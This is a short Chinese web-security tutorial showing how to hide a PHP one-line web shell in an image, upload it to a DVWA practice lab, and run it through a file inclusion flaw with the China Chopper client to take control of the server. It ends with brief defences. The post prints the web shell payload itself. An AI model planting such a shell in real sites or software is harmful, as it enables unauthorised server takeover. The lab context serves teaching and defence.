【WEB攻防】图片木马的利用

交流Q群:876554035

一,图片木马原理
图片木马以文件上传漏洞为基本条件,将可执行的脚本写入到图片中去,再利用文件包含漏洞来执行图片中的一句话木马,从而获取目标服务器权限。

二.工具及环境
DVWA靶场环境
010Editor
中国菜刀
三.具体步骤
1.登陆DVWA靶场,调整安全级别为high,进入到File Upload页面。
【WEB攻防】图片木马的利用
图一 登陆界面
【WEB攻防】图片木马的利用
图二 选择安全级别,进入
2.利用010 Editor工具制作一句话图片木马,一句话木马为 <?php @eval($_POST[‘pass’]);?>
【WEB攻防】图片木马的利用
图三 制作图片木马
3.图片木马制作完成,跟正常图片看上去没什么两样,一句话木马写入图片中。
【WEB攻防】图片木马的利用
图四 图片马
4.在DVWA靶场中上传图片木马
【WEB攻防】图片木马的利用
图五 上传
【WEB攻防】图片木马的利用
图六 图片
5.打开图片木马连接工具中国菜刀
【WEB攻防】图片木马的利用
图七 菜刀连接
6.菜刀创建连接(此处使用的是本地文件包含漏洞来执行图片中的一句话木马)
【WEB攻防】图片木马的利用
图八 连接配置
7.通过菜刀连图片马,成功拿到目标服务器权限。
【WEB攻防】图片木马的利用
图九 拿到权限
四.防范
●文件上传的目录设置为不可执行
●判断文件类型
●使用随机数改写文件名和文件路径